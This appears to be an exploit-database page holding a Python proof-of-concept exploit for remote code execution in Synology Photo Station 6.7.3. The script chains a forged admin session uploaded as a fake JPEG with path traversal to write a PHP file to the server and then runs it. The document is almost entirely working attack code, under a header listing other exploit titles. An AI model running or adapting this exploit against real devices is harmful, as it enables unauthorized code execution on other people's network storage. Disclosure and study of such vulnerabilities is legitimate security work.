3f58d5334c
4 new exploits WildMIDI 0.4.2 - Multiple Vulnerabilities Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation Microsoft Windows - LNK Shortcut File Code Execution Microsoft Windows - '.LNK' Shortcut File Code Execution Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017) Oracle E-Business Suite 12.x - Server-Side Request Forgery Advantech SUSIAccess <= 3.0 - Directory Traversal / Information Disclosure (Metasploit) Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit) Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload Technicolor TC7337 - SSID Persistent Cross-Site Scripting Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
56 lines
No EOL
2.2 KiB
Python
Executable file
56 lines
No EOL
2.2 KiB
Python
Executable file
'''
|
|
Source: https://blogs.securiteam.com/index.php/archives/3356
|
|
|
|
Vulnerability details
|
|
The remote code execution is a combination of 4 different vulnerabilities:
|
|
|
|
Upload arbitrary files to the specified directories
|
|
Log in with a fake authentication mechanism
|
|
Log in to Photo Station with any identity
|
|
Execute arbitrary code by authenticated user with administrator privileges
|
|
The chain of vulnerabilities will allow you, in the end, to execute code as:
|
|
|
|
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
|
|
'''
|
|
import requests
|
|
|
|
# What server you want to attack
|
|
synology_ip = 'http://192.168.1.100'
|
|
|
|
# Your current IP
|
|
ip = '192.168.1.200'
|
|
|
|
# PHP code you want to execute
|
|
php_to_execute = '<?php echo system("id"); ?>'
|
|
|
|
encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
|
|
|
|
print "[+] Set fake admin sesssion"
|
|
file = [('file', ('foo.jpg', encoded_session))]
|
|
|
|
r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
|
|
print r.text
|
|
|
|
print "[+] Login as fake admin"
|
|
|
|
# Depends on version it might be stored in different dirs
|
|
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
|
|
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
|
|
|
|
try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
|
|
|
|
whichact = {'action' : 'get_setting'}
|
|
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
|
|
print r.text
|
|
|
|
print "[+] Upload php file"
|
|
|
|
c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
|
|
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
|
|
print r.text
|
|
|
|
|
|
print "[+] Execute payload"
|
|
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
|
|
|
|
print f.text |